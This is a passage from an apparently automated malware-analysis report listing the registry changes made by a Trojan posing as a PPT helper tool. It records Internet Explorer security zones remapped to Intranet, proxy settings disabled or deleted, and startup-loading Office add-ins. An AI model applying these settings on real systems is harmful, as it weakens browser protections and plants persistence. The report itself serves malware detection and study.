[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7E A5 5E 95 45 54 1E 37 10 8B 3A 1F 7F B5 05 A7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Internet Explorer]
"iexplore.exe" = "Internet Explorer"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process OfficeAssist.0419.80.1123.exe:744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"DisplayName" = "PPT美化大师"
[HKCU\Software\PPTAssist\Common]
"infoGUID" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\PPTAssist\Common\Setting]
"HideExcelPane" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\utility\uninst.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist]
"assistupdate.exe" = "PPT美化大师"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"Publisher" = "ç 海金山办公软件有é™Âå…¬å¸"
[HKCU\Software\PPTAssist\Common]
"DistSrc" = "80.1123"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"LocationRoot" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"DisplayVersion" = "1.0.0.0419"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\pptassist\~21d1e5\install_res\1.png,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\PPTAssist\Common\Setting]
"HidePowerPntPane" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted\%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542]
"OfficeAssist.0419.80.1123.exe" = "1"
[HKCR\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\TypeLib]
"Version" = "2.5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\utility\uninst.exe"
[HKCU\Software\PPTAssist\Common\Setting]
"HideWordPane" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B 01 11 EA 39 04 7C C5 5F 78 10 78 B4 DA 80 18"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCR\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.5\HELPDIR]
"(Default)" = "%Program Files%\Common Files\Microsoft Shared\OFFICE14"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist]
"notify.exe" = "PPT Assist Expansion tool"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\PPTAssist\Common]
"Version" = "1.0.0.0419"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCR\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\TypeLib]
"(Default)" = "{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process OfficeAssist.0419.80.1123.exe:1752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C AC 34 08 E8 A4 9C 69 66 D5 4C 77 7C D3 8D D2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process regsvr32.exe:2136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\ImageOle.GifAnimator.1]
"(Default)" = "GifAnimator Class"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Version]
"(Default)" = "1.0"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\VersionIndependentProgID]
"(Default)" = "ImageOle.GifAnimator"
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ToolboxBitmap32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll, 102"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"
[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0]
"(Default)" = "ImageOle 1.0 Type Library"
[HKCR\ImageOle.GifAnimator\CurVer]
"(Default)" = "ImageOle.GifAnimator.1"
[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\TypeLib]
"Version" = "1.0"
[HKCR\ImageOle.GifAnimator]
"(Default)" = "GifAnimator Class"
[HKCR\ImageOle.GifAnimator\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}]
"(Default)" = "IGifAnimator"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 98 28 95 58 44 3E 4B C5 13 C2 2B D5 E1 01 09"
[HKCR\ImageOle.GifAnimator.1\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ProgID]
"(Default)" = "ImageOle.GifAnimator.1"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}]
"(Default)" = "GifAnimator Class"
The process regsvr32.exe:2716 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F AA 29 AE 0B B0 15 0B DB 79 47 BC 79 F8 93 9F"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\WebVideo.dll"
"ThreadingModel" = "Apartment"
[HKCR\WebVideo.ExeClient]
"(Default)" = "ExeClient Class"
[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0]
"(Default)" = "WebVideo 1.0 Type Library"
[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\WebVideo.ExeClient.1]
"(Default)" = "ExeClient Class"
[HKCR\WebVideo.ExeClient\CurVer]
"(Default)" = "WebVideo.ExeClient.1"
[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}]
"(Default)" = "ExeClient Class"
[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}]
"(Default)" = "IExeClient"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\VersionIndependentProgID]
"(Default)" = "WebVideo.ExeClient"
[HKCR\WebVideo.ExeClient\CLSID]
"(Default)" = "{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}"
[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\TypeLib]
"Version" = "1.0"
"(Default)" = "{16FD93FF-DAB2-4658-B17B-F714A86D942F}"
[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\WebVideo.ExeClient.1\CLSID]
"(Default)" = "{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\ProgID]
"(Default)" = "WebVideo.ExeClient.1"
[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\TypeLib]
"(Default)" = "{16FD93FF-DAB2-4658-B17B-F714A86D942F}"
[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\WebVideo.dll"
The process regsvr32.exe:1280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Classes\PPTAssist.Addins]
"(Default)" = "PPTAssist Class"
[HKCU\Software\Microsoft\Office\Word\Addins\PPTAssist.Addins]
"LoadBehavior" = "3"
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"
[HKCU\Software\Classes\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Classes\PPTAssist.Addins\CLSID]
"(Default)" = "{034DF736-A378-4292-ACAE-A561088999F5}"
[HKCU\Software\Classes\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\Version]
"(Default)" = "1.0"
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"
[HKCU\Software\Microsoft\Office\Powerpoint\Addins\PPTAssist.Addins]
"LoadBehavior" = "3"
[HKCU\Software\Classes\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0\0\win32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist.dll"
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\ProgID]
"(Default)" = "PPTAssist.Control.1"
[HKCU\Software\Classes\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0\HELPDIR]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist"
[HKCU\Software\Classes\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0\FLAGS]
"(Default)" = "0"
[HKCU\Software\Classes\PPTAssist.Control.1\CLSID]
"(Default)" = "{1077138E-896C-445E-BD31-CFCFFA4636C4}"
[HKCU\Software\Classes\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist.dll"
[HKCU\Software\Microsoft\Office\Powerpoint\Addins\PPTAssist.Addins]
"CommandLineSafe" = "1"
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Classes\PPTAssist.Addins.1\CLSID]
"(Default)" = "{034DF736-A378-4292-ACAE-A561088999F5}"
[HKCU\Software\Microsoft\Office\Excel\Addins\PPTAssist.Addins]
"CommandLineSafe" = "1"
[HKCU\Software\Classes\PPTAssist.Control]
"(Default)" = "PPTAssistControl Class"
[HKCU\Software\Classes\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"
[HKCU\Software\Classes\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0]
"(Default)" = "PPTAssist 1.0 ÀàÃÂÿâ"
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\VersionIndependentProgID]
"(Default)" = "PPTAssist.Addins"
[HKCU\Software\Microsoft\Office\Powerpoint\Addins\PPTAssist.Addins]
"Description" = "PPTÃÀ»¯´óʦ"
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\ProgID]
"(Default)" = "PPTAssist.Addins.1"
[HKCU\Software\Classes\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}]
"(Default)" = "IRibbonCallback"
[HKCU\Software\Classes\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Microsoft\Office\Excel\Addins\PPTAssist.Addins]
"FriendlyName" = "PPTÃÀ»¯´óʦ"
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist.dll"
[HKCU\Software\Microsoft\Office\Excel\Addins\PPTAssist.Addins]
"LoadBehavior" = "3"
[HKCU\Software\Microsoft\Office\Word\Addins\PPTAssist.Addins]
"Description" = "PPTÃÀ»¯´óʦ"
[HKCU\Software\Classes\PPTAssist.Addins.1]
"(Default)" = "PPTAssist Class"
[HKCU\Software\Microsoft\Office\Excel\Addins\PPTAssist.Addins]
"Description" = "PPTÃÀ»¯´óʦ"
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}]
"(Default)" = "PPTAssist Class"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 B1 53 ED 4F BB 45 4B EF 51 8F C1 FF E7 FE 4A"
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Classes\PPTAssist.Addins\CurVer]
"(Default)" = "PPTAssist.Addins.1"
[HKCU\Software\Classes\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}]
"(Default)" = "IWpsAssistControl"
[HKCU\Software\Classes\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}]
"(Default)" = "PPTAssistControl Class"
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\VersionIndependentProgID]
"(Default)" = "PPTAssist.Control"
[HKCU\Software\Classes\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Office\Word\Addins\PPTAssist.Addins]
"CommandLineSafe" = "1"
[HKCU\Software\Classes\PPTAssist.Control\CLSID]
"(Default)" = "{1077138E-896C-445E-BD31-CFCFFA4636C4}"
[HKCU\Software\Classes\PPTAssist.Control.1]
"(Default)" = "PPTAssistControl Class"
[HKCU\Software\Microsoft\Office\Word\Addins\PPTAssist.Addins]
"FriendlyName" = "PPTÃÀ»¯´óʦ"
[HKCU\Software\Microsoft\Office\Powerpoint\Addins\PPTAssist.Addins]
"FriendlyName" = "PPTÃÀ»¯´óʦ"
[HKCU\Software\Classes\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"
[HKCU\Software\Classes\PPTAssist.Control\CurVer]
"(Default)" = "PPTAssist.Control.1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\Programmable]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\ProgID]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\TypeLib]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\TypeLib]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\ProgID]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\Version]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\InprocServer32]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\InprocServer32]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\VersionIndependentProgID]
[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\VersionIndependentProgID]
[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\Programmable]
The process regsvr32.exe:2280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "70 7B 80 77 94 5C 96 B6 EE D3 E5 42 32 1B AB 6B"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"
[HKCR\Invoker9158.InvokeChat]
"(Default)" = "InvokeChat Class"
[HKCR\Invoker9158.InvokeChat.1]
"(Default)" = "InvokeChat Class"
[HKCR\Invoker9158.InvokeChat\CurVer]
"(Default)" = "Invoker9158.InvokeChat.1"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\VersionIndependentProgID]
"(Default)" = "Invoker9158.InvokeChat"
[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0]
"(Default)" = "Invoker9158 1.0 Type Library"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"
[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Invoker9158.InvokeChat.1\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\ProgID]
"(Default)" = "Invoker9158.InvokeChat.1"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}]
"(Default)" = "InvokeChat Class"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}]
"(Default)" = "IInvokeChat"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid32]
